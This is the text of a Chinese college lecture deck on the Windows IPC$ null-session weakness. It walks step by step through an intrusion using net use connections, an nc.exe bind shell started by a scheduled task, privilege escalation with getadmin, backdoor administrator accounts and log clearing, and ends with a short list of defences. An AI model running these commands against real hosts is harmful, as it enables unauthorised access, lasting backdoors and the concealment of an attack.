《网络攻击和防御》专题课件-1：IPC$漏洞.ppt

广州科技职业技术学院 黄伟 IPC$漏洞 什么是IPC$? 在win NT/2000环境下 , IPC$(Inter-Process Communication)，它是为了让进程间网络通信而开放的主机间的连接。通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。 IPC$的特点 两台主机间任何时候只允许有一个IPC$连接。 Windows Server 2003上使用139端口。 连接时需提供用户名跟密码。 允许空连接，即用户名和密码为空。 致命漏洞 IPC$连接建立后，被连接的主机没有把对方的活动限制在进程间通信范围内，而是允许对方越权访问非IPC$的共享资源。 战云：攻击准备 宝贝你好吗:空连接 net use \\ IP \ipc$ “” /user:“” 窃听：使用嗅探工具，如sniffer pro 偷窥：使用扫描工具，如X-Scan 斗智：使用密码猜测工具，如流光 若攻击机是Win7，安装Telnet服务。 闪击：连接 咒语：建立ipc$连接 net use \\IP\ipc$ “密码” /user:“用户名” 越界：映射对方机器其他共享（例如admin$）到本机（例如Z盘） net use z: \\IP\admin$ 闪击：连接 瑞士军刀：上传木马程序 把黑客工具nc.exe拷到z盘 把通用DOS命令窗口工具cmd.exe拷到z盘 闪击：连接 定时炸弹：向对方机器添加定时任务，在给定时间启动cmd.exe, 并把界面输出到指定端口。 net time \\IP 【得到对方时间】 at \\IP 指定时间 nc?-l?-p?端口号?-t?-e?cmd.exe 【使对方在指定时间启动DOS窗口，并输出到对方的端口号端口。】 闪击：连接 地狱之门：登录到定时炸弹炸开的端口得到一个shell（命令窗口） telnet IP 端口号 不要高兴得太早：权限不够 渗透：提权 漏洞之后的漏洞 NT核心进程WinLogon可被非法使用, 用来把任何用户加入管理员组。 王牌出场：运行提权程序 把提权程序getadmin.exe,gasys.dll拷到z盘，再在shell中执行getadmin.exe。 当家作主：破坏 篡改主页 上传木马 格式化硬盘 不忍说再见：后门 咸鱼翻身：激活冻结账户 net user 用户名 /active:yes 潜伏：添加用户 net user 用户名 密码 /add 【shell中执行】 重要人物：提升潜伏用户的权限 net localgroup administrators 用户名 /add 【shell中执行，使用户成为超级管理员】 net localgroup “remote desktop users” 用户名 /add【shell中执行，使用户可远程登录】 打扫战场：痕迹清理 清除指纹：如前面用过的cmd.exe, nc.exe, getadmin.exe, gasys.dll 清除日志：使用clearlog.exe, cleaniis.exe 道高一丈：防范 1、禁止空连接进行枚举(此操作并不能阻止空连接在的建立) 2、禁止默认共享 3、停止server服务 4、安装防火墙，或者端口过滤(滤掉139等) 5、给所有账户设置复杂密码，防止通过ipc$穷举密码